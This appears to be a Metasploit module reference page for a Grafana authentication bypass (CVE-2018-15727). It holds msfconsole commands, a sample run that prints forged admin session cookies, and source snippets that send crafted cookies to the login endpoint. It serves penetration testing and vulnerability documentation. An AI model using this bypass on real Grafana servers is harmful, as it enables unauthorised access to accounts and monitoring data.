Grafana 2.0 through 5.2.2 authentication bypass for LDAP and OAuth - Metasploit

This page contains detailed information about how to use the auxiliary/admin/http/grafana_auth_bypass metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview

Name: Grafana 2.0 through 5.2.2 authentication bypass for LDAP and OAuth
Module: auxiliary/admin/http/grafana_auth_bypass
Source code: modules/auxiliary/admin/http/grafana_auth_bypass.py
Disclosure date: 2019-08-14
Last modification time: 2022-09-29 01:28:56 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 3000
List of CVEs: CVE-2018-15727

This module generates a remember me cookie for a valid username. Through unpropper seeding while userdate are requested from LDAP or OAuth it's possible to craft a valid remember me cookie. This cookie can be used for bypass authentication for everyone knowing a valid username.

Module Ranking and Traits

Module Ranking:

• normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/admin/http/grafana_auth_bypass
msf auxiliary(grafana_auth_bypass) > show options
    ... show and set options ...
msf auxiliary(grafana_auth_bypass) > set RHOSTS ip-range
msf auxiliary(grafana_auth_bypass) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(grafana_auth_bypass) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(grafana_auth_bypass) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(grafana_auth_bypass) > set RHOSTS file:/tmp/ip_list.txt

Knowledge Base

msf5 > use auxiliary/admin/http/grafana_auth_bypass 
msf5 auxiliary(admin/http/grafana_auth_bypass) > show options 

Module options (auxiliary/admin/http/grafana_auth_bypass):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COOKIE                      no        Decrypt captured cookie
   RHOSTS     127.0.0.1        yes       Address of target
   RPORT      3000             yes       Port of target
   SSL        false            yes       set SSL/TLS based connection
   TARGETURI  /                no        Base URL of grafana instance
   THREADS    1                yes       The number of concurrent threads
   USERNAME                    no        Valid username
   VERSION    5                yes       Grafana version: "2-4" or "5" (Accepted: 2-4, 5)

msf5 auxiliary(admin/http/grafana_auth_bypass) > set RHOSTS 192.168.202.3
RHOSTS => 192.168.202.3
msf5 auxiliary(admin/http/grafana_auth_bypass) > set USERNAME Administrator
USERNAME => Administrator
msf5 auxiliary(admin/http/grafana_auth_bypass) > run

[*] Running for 192.168.202.3...
[+] Encrypted remember cookie: 1bedc565c40b58307afa4672efd72d3c37f02684c2deb0ce0b55594cbce337fc90625356dc232e998f
[+] Set following cookies to get access to the grafana instance.
[+] grafana_user=Administrator;
[+] grafana_remember=a232b98b9365d3d8f7ce253adfb9779f1114131a68cc8cbb4a53ee6f5cb71acfbe25773e95db051021;
[+] grafana_sess=4ecdc0c13ebca229;
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Go back to menu.

Msfconsole Usage

Here is how the admin/http/grafana_auth_bypass auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/http/grafana_auth_bypass

msf6 auxiliary(admin/http/grafana_auth_bypass) > show info

       Name: Grafana 2.0 through 5.2.2 authentication bypass for LDAP and OAuth
     Module: auxiliary/admin/http/grafana_auth_bypass
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2019-08-14

Provided by:
  Rene Riedling
  Sebastian Solnica

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  COOKIE                      no        Decrypt captured cookie
  RHOSTS     127.0.0.1        yes       Address of target
  RPORT      3000             yes       Port of target
  SSL        false            yes       set SSL/TLS based connection
  TARGETURI  /                no        Base URL of grafana instance
  THREADS    1                yes       The number of concurrent threads (max one per host)
  USERNAME                    no        Valid username
  VERSION    5                yes       Grafana version: "2-4" or "5" (Accepted: 2-4, 5)

Description:
  This module generates a remember me cookie for a valid username. 
  Through unpropper seeding while userdate are requested from LDAP or 
  OAuth it's possible to craft a valid remember me cookie. This cookie 
  can be used for bypass authentication for everyone knowing a valid 
  username.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2018-15727
  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15727
  https://grafana.com/blog/2018/08/29/grafana-5.2.3-and-4.6.4-released-with-important-security-fix/

Module Options

This is a complete list of options available in the admin/http/grafana_auth_bypass auxiliary module:

msf6 auxiliary(admin/http/grafana_auth_bypass) > show options

Module options (auxiliary/admin/http/grafana_auth_bypass):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COOKIE                      no        Decrypt captured cookie
   RHOSTS     127.0.0.1        yes       Address of target
   RPORT      3000             yes       Port of target
   SSL        false            yes       set SSL/TLS based connection
   TARGETURI  /                no        Base URL of grafana instance
   THREADS    1                yes       The number of concurrent threads (max one per host)
   USERNAME                    no        Valid username
   VERSION    5                yes       Grafana version: "2-4" or "5" (Accepted: 2-4, 5)

Advanced Options

Here is a complete list of advanced options supported by the admin/http/grafana_auth_bypass auxiliary module:

msf6 auxiliary(admin/http/grafana_auth_bypass) > show advanced

Module advanced options (auxiliary/admin/http/grafana_auth_bypass):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   ShowProgress         true             yes       Display progress messages during a scan
   ShowProgressPercent  10               yes       The interval in percent that progress should be shown
   VERBOSE              false            no        Enable detailed status messages
   WORKSPACE                             no        Specify the workspace for this module

Auxiliary Actions

This is a list of all auxiliary actions that the admin/http/grafana_auth_bypass module can do:

msf6 auxiliary(admin/http/grafana_auth_bypass) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the admin/http/grafana_auth_bypass auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/http/grafana_auth_bypass) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Module dependency (requests) is missing, cannot continue

Here is a relevant code snippet related to the "Module dependency (requests) is missing, cannot continue" error message:

103:	    return username
104:	
105:	
106:	def run(args):
107:	    if dependencies_requests_missing:
108:	        logging.error('Module dependency (requests) is missing, cannot continue')
109:	        return
110:	    
111:	    if dependencies_cryptography_missing:
112:	        logging.error('Module dependency (cryptography) is missing, cannot continue')
113:	        return

Module dependency (cryptography) is missing, cannot continue

Here is a relevant code snippet related to the "Module dependency (cryptography) is missing, cannot continue" error message:

107:	    if dependencies_requests_missing:
108:	        logging.error('Module dependency (requests) is missing, cannot continue')
109:	        return
110:	    
111:	    if dependencies_cryptography_missing:
112:	        logging.error('Module dependency (cryptography) is missing, cannot continue')
113:	        return
114:	    
115:	    if args['VERSION'] == "5":
116:	        try:
117:	            username = args['USERNAME']

Unable to set username

Here is a relevant code snippet related to the "Unable to set username" error message:

123:	            try:
124:	                username = decrypt_version5(args['COOKIE'])
125:	                module.log("Decrypted username: "+username, "good")
126:	                cookie = args['COOKIE']
127:	            except:
128:	                module.log("Unable to set username", "error")
129:	                return
130:	    elif args['VERSION'] == "2-4":
131:	        try:
132:	            username = args['USERNAME']
133:	            cookie = encrypt_version4(args['USERNAME'])

Unable to set username

Here is a relevant code snippet related to the "Unable to set username" error message:

138:	            try:
139:	                username = decrypt_version4(args['COOKIE'])
140:	                module.log("Decrypted username: "+username, "good")
141:	                cookie = args['COOKIE']
142:	            except:
143:	                module.log("Unable to set username", "error")
144:	                return
145:	    else:
146:	        module.log("Version not supported.", "error")
147:	
148:	    try:

Version not supported.

Here is a relevant code snippet related to the "Version not supported." error message:

141:	                cookie = args['COOKIE']
142:	            except:
143:	                module.log("Unable to set username", "error")
144:	                return
145:	    else:
146:	        module.log("Version not supported.", "error")
147:	
148:	    try:
149:	        cookies = {'grafana_remember': cookie, 'grafana_user': username}
150:	
151:	        if args['SSL'] == "false":

Failed to sending request to host.

Here is a relevant code snippet related to the "Failed to sending request to host." error message:

164:	                    args['RPORT'] + args['TARGETURI'] + "/login/"
165:	        module.log('Targeting URL: ' + url, 'debug')
166:	        r = requests.get(url=url, cookies=cookies, allow_redirects=False)
167:	
168:	    except:
169:	        module.log("Failed to sending request to host.", "error")
170:	        return
171:	
172:	    if r.status_code == 302:
173:	        try:
174:	            grafana_user = re.search(

Failed to generate cookies out of request.

Here is a relevant code snippet related to the "Failed to generate cookies out of request." error message:

182:	                "Set following cookies to get access to the grafana instance.", "good")
183:	            module.log(grafana_user, "good")
184:	            module.log(grafana_remember, "good")
185:	            module.log(grafana_sess, "good")
186:	        except:
187:	            module.log("Failed to generate cookies out of request.", "error")
188:	            return
189:	    else:
190:	        module.log("Target is not vulnerable.", "warning")
191:	        return
192:	

Go back to menu.

Related Pull Requests

• #12145 Merged Pull Request: Module to generate grafana remember cookies

References

• CVE-2018-15727
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15727
• https://grafana.com/blog/2018/08/29/grafana-5.2.3-and-4.6.4-released-with-important-security-fix/

See Also

Check also the following modules related to this module:

• auxiliary/scanner/http/grafana_plugin_traversal
• auxiliary/admin/http/allegro_rompager_auth_bypass
• auxiliary/admin/http/iis_auth_bypass
• auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
• auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
• auxiliary/admin/networking/cisco_dcnm_auth_bypass
• auxiliary/admin/networking/cisco_secure_acs_bypass
• auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass
• auxiliary/admin/vnc/realvnc_41_bypass
• auxiliary/gather/samsung_browser_sop_bypass
• auxiliary/scanner/http/cisco_ios_auth_bypass
• auxiliary/scanner/http/dir_webdav_unicode_bypass
• auxiliary/scanner/http/intel_amt_digest_bypass
• auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
• auxiliary/scanner/http/rewrite_proxy_bypass
• auxiliary/scanner/http/verb_auth_bypass
• auxiliary/scanner/misc/dahua_dvr_auth_bypass
• auxiliary/scanner/ssh/libssh_auth_bypass
• auxiliary/admin/http/dlink_dir_300_600_exec_noauth
• auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
• auxiliary/admin/http/netgear_auth_download
• auxiliary/admin/sap/sap_configservlet_exec_noauth
• auxiliary/gather/http_pdf_authors
• auxiliary/gather/peplink_bauth_sqli
• auxiliary/pdf/foxit/authbypass
• auxiliary/scanner/db2/db2_auth
• auxiliary/scanner/http/tplink_traversal_noauth
• auxiliary/scanner/mysql/mysql_authbypass_hashdump
• auxiliary/scanner/vmware/vmauthd_login
• auxiliary/scanner/vmware/vmauthd_version
• auxiliary/scanner/vnc/vnc_none_auth
• auxiliary/scanner/winrm/winrm_auth_methods
• auxiliary/scanner/http/fortimail_login_bypass_detection

Authors

• Rene Riedling
• Sebastian Solnica

Version

This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.